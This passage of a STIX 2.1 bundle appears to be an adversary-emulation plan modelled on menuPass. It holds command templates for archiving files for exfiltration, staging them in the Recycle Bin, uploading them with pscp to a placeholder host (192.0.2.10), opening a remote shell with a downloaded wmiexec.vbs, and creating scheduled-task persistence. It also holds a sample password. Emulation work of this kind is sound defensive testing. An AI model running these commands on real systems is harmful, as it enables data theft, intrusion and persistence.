            "target_ref": "user-account--067aa7b8-999f-45f9-8039-1913e461f7b6"
        },
        {
            "type": "user-account",
            "spec_version": "2.1",
            "id": "user-account--067aa7b8-999f-45f9-8039-1913e461f7b6",
            "credential": "badpassword123\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--56eb3a63-f0b3-4cb0-b002-b25ccf760393",
            "created": "2024-02-04T21:20:01.199732Z",
            "modified": "2024-02-04T21:20:01.199732Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef",
            "target_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "value": "192.0.2.10\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--0bb0839c-00ca-49f6-80de-372ce88d1273",
            "created": "2024-02-04T21:20:01.201657Z",
            "modified": "2024-02-04T21:20:01.201657Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--160a1e0f-0f9b-49bb-a0fe-7e362b51737f",
            "created": "2024-02-04T21:20:01.202108Z",
            "modified": "2024-02-04T21:20:01.202108Z",
            "name": "Archive Collected Data - Archive via Utility",
            "description": "Compress and stage data for exfiltration",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1560.001",
                    "input_arguments": {
                        "rar_archive_name": {
                            "default": "ss.rar\n",
                            "description": "Name of rar archive",
                            "type": "String"
                        },
                        "rar_files": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path to files to compress",
                            "type": "Path"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "rar.exe a \"#{rar_archive_name}\" \"#{rar_files}\"\n",
                                "payloads": [
                                    "rar.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "Archive Collected Data - Archive via Utility"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--2ad541f1-bc4d-4367-b13a-8cbc75c0cbd6",
            "created": "2024-02-04T21:20:01.213151Z",
            "modified": "2024-02-04T21:20:01.213151Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--160a1e0f-0f9b-49bb-a0fe-7e362b51737f",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--a9541b2f-39ca-4b40-b646-a06454dccf54",
            "created": "2024-02-04T21:20:01.213552Z",
            "modified": "2024-02-04T21:20:01.213552Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--160a1e0f-0f9b-49bb-a0fe-7e362b51737f"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--b4fa6d2e-ed9c-4a86-81aa-19331983fe0d",
            "created": "2024-02-04T21:20:01.213999Z",
            "modified": "2024-02-04T21:20:01.213999Z",
            "name": "Recycle Bin Staging",
            "description": "menuPass actors are thought to have staged archives in the Recycle Bin for exfiltration.",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1074.001",
                    "input_arguments": {
                        "copy_filename": {
                            "default": "aa.rar\n",
                            "description": "Name of file to copy",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "copy #{copy_filename} \"C:\\$Recycle.Bin\\\"\n"
                            }
                        }
                    },
                    "technique_name": "Local Data Staging"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--f12ac26e-1af1-45cd-ab31-2dcc10bf61db",
            "created": "2024-02-04T21:20:01.218066Z",
            "modified": "2024-02-04T21:20:01.218066Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--b4fa6d2e-ed9c-4a86-81aa-19331983fe0d"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "created": "2024-02-04T21:20:01.218536Z",
            "modified": "2024-02-04T21:20:01.218536Z",
            "name": "Transfer Data to Cloud Account",
            "description": "Exfil data to cloud account",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1537",
                    "input_arguments": {
                        "pscp_drop_location": {
                            "default": "temp\n",
                            "description": "Path where to download pscp.exe",
                            "type": "Path"
                        },
                        "pscp_exfil_files": {
                            "default": "C:\\Windows\\Temp\\exfil\n",
                            "description": "Path of files to be sent with pscp",
                            "type": "Path"
                        },
                        "pscp_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Local path to pscp.exe",
                            "type": "Path"
                        },
                        "pscp_server": {
                            "default": "192.0.2.10\n",
                            "description": "IP or hostname of remote host to connect via pscp",
                            "type": "String"
                        },
                        "pscp_url": {
                            "default": "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe",
                            "description": "Path to download pscp.exe",
                            "type": "URL"
                        },
                        "pscp_user": {
                            "default": "Administrator\n",
                            "description": "Remote username",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{pscp_local_path}\\pscp.exe\" \"#{pscp_exfil_files}\" \"#{pscp_user}\"@\"#{pscp_server}\":/\"#{pscp_drop_location}\"\n",
                                "payloads": [
                                    "pscp.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "Transfer Data to Cloud Account"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--6dd6c7e5-d711-4263-abd6-34de71cbd70a",
            "created": "2024-02-04T21:20:01.22053Z",
            "modified": "2024-02-04T21:20:01.22053Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "target_ref": "url--f5c26f53-a483-5804-ac87-19d2cab332b7"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--f5c26f53-a483-5804-ac87-19d2cab332b7",
            "value": "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--c3e368bc-0eb8-4a1a-950e-7c6e366fbbf9",
            "created": "2024-02-04T21:20:01.222777Z",
            "modified": "2024-02-04T21:20:01.222777Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--2663d659-c707-48b8-a7fb-36b70f8aa868",
            "created": "2024-02-04T21:20:01.234292Z",
            "modified": "2024-02-04T21:20:01.234292Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "target_ref": "directory--2898736f-6abf-5836-bd10-49c48c434bfd"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--2898736f-6abf-5836-bd10-49c48c434bfd",
            "path": "C:\\Windows\\Temp\\exfil\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--1b4977c0-4e1d-4fe6-be11-55b1bf3b73f2",
            "created": "2024-02-04T21:20:01.23616Z",
            "modified": "2024-02-04T21:20:01.23616Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "target_ref": "user-account--edd59c04-d2ad-511d-9f7b-63a53e1ddc75"
        },
        {
            "type": "user-account",
            "spec_version": "2.1",
            "id": "user-account--edd59c04-d2ad-511d-9f7b-63a53e1ddc75",
            "account_login": "Administrator\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--af0e29d1-a07c-4de2-b51f-4a7524402e81",
            "created": "2024-02-04T21:20:01.243298Z",
            "modified": "2024-02-04T21:20:01.243298Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "target_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "value": "192.0.2.10\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--b3ce33d6-6b8e-47a9-9ee9-d5608bfca169",
            "created": "2024-02-04T21:20:01.244586Z",
            "modified": "2024-02-04T21:20:01.244586Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c",
            "target_ref": "url--9440158b-404b-54c8-afd2-16383f78d093"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--9440158b-404b-54c8-afd2-16383f78d093",
            "value": "temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--47e855e4-6e5e-44d7-b45c-052b2be8ee51",
            "created": "2024-02-04T21:20:01.244824Z",
            "modified": "2024-02-04T21:20:01.244824Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--ea4bc858-ba13-4f97-9df3-c543d8f3d44c"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--8911d502-747a-4155-adcd-b03a1f284ee7",
            "created": "2024-02-04T21:20:01.245018Z",
            "modified": "2024-02-04T21:20:01.245018Z",
            "name": "Windows Management Instrumentation",
            "description": "Using wmiexec.vbs to execute tactical malware",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1047",
                    "input_arguments": {
                        "wmiexec_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of wmiexec.vbs",
                            "type": "Path"
                        },
                        "wmiexec_remote_host": {
                            "default": "192.0.2.10\n",
                            "description": "Hostname or IP of remote host",
                            "type": "String"
                        },
                        "wmiexec_url": {
                            "default": "https://raw.githubusercontent.com/Twi1ight/AD-Pentest-Script/master/wmiexec.vbs\n",
                            "description": "Path to download wmiexec.vbs",
                            "type": "URL"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "cscript.exe \"#{wmiexec_local_path}\\wmiexec.vbs\" /shell \"#{wmiexec_remote_host}\"\n",
                                "payloads": [
                                    "wmiexec.vbs"
                                ]
                            }
                        }
                    },
                    "technique_name": "Windows Management Instrumentation"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--d065351b-379a-48be-bb9a-82821eabab30",
            "created": "2024-02-04T21:20:01.247915Z",
            "modified": "2024-02-04T21:20:01.247915Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--8911d502-747a-4155-adcd-b03a1f284ee7",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--57adde86-6a84-493c-8469-5c3736aff459",
            "created": "2024-02-04T21:20:01.249845Z",
            "modified": "2024-02-04T21:20:01.249845Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--8911d502-747a-4155-adcd-b03a1f284ee7",
            "target_ref": "url--7eb0897d-80ff-5cdf-89f4-3b3eb48ca563"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--7eb0897d-80ff-5cdf-89f4-3b3eb48ca563",
            "value": "https://raw.githubusercontent.com/Twi1ight/AD-Pentest-Script/master/wmiexec.vbs\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--7e10f964-1026-4884-888f-9888260b22c4",
            "created": "2024-02-04T21:20:01.251601Z",
            "modified": "2024-02-04T21:20:01.251601Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--8911d502-747a-4155-adcd-b03a1f284ee7",
            "target_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "value": "192.0.2.10\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--0f7b774e-eea8-4bcc-bb54-b10a99e7fead",
            "created": "2024-02-04T21:20:01.251885Z",
            "modified": "2024-02-04T21:20:01.251885Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--8911d502-747a-4155-adcd-b03a1f284ee7"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--236d1357-64f9-4a98-afc1-bccaa89aba8c",
            "created": "2024-02-04T21:20:01.252133Z",
            "modified": "2024-02-04T21:20:01.252133Z",
            "name": "Scheduled Task Persistence",
            "description": "menuPass is reported to have used scheduled tasks to persist",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1553.005",
                    "input_arguments": {
                        "schtask_schedule": {
                            "default": "DAILY\n",
                            "description": "Value that specifies the schedule frequency. (MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONLOGON, ONIDLE, and ONEVENT)",
                            "type": "String"
                        },
                        "schtask_taskname": {
                            "default": "taskname\n",
                            "description": "A value that specifies a name which uniquely identifies the scheduled task.",
                            "type": "String"
                        },
                        "schtask_taskrun": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "A value that specifies the path and file name of the task to be run at the scheduled time.",
                            "type": "Path"
                        },
                        "schtask_username": {
                            "default": "username\n",
                            "description": "A value that specifies the user context under which the task runs.",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "schtasks /create /sc \"#{schtask_schedule}\" /tn \"#{schtask_taskname}\" /tr \"#{schtask_taskrun}\" /ru \"#{schtask_username}\"\n"
                            }
                        }
                    },
                    "technique_name": "Scheduled Task/Job: Scheduled Task"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--18a360bb-728d-40c0-8760-5c89a47eb6fa",
            "created": "2024-02-04T21:20:01.254408Z",
            "modified": "2024-02-04T21:20:01.254408Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--236d1357-64f9-4a98-afc1-bccaa89aba8c",
            "target_ref": "url--d68a48c3-d2ee-59c3-9382-66dd9d9c7ca2"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--d68a48c3-d2ee-59c3-9382-66dd9d9c7ca2",
            "value": "DAILY\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--ecc1c645-d0ad-4e84-83a7-df0dbd579121",
            "created": "2024-02-04T21:20:01.257331Z",
            "modified": "2024-02-04T21:20:01.257331Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--236d1357-64f9-4a98-afc1-bccaa89aba8c",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--c6229acc-7360-49e7-9cd8-0faa07865e5d",
            "created": "2024-02-04T21:20:01.260311Z",
            "modified": "2024-02-04T21:20:01.260311Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--236d1357-64f9-4a98-afc1-bccaa89aba8c",
            "target_ref": "user-account--322f9c26-f146-5ab0-90af-bc1c8fd3c6d7"
        },
        {
            "type": "user-account",
            "spec_version": "2.1",
            "id": "user-account--322f9c26-f146-5ab0-90af-bc1c8fd3c6d7",
            "account_login": "username\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--0eda72b9-7328-4ba9-a6d8-e838a3b788fd",
            "created": "2024-02-04T21:20:01.260549Z",
            "modified": "2024-02-04T21:20:01.260549Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--236d1357-64f9-4a98-afc1-bccaa89aba8c"
        }
    ]
}
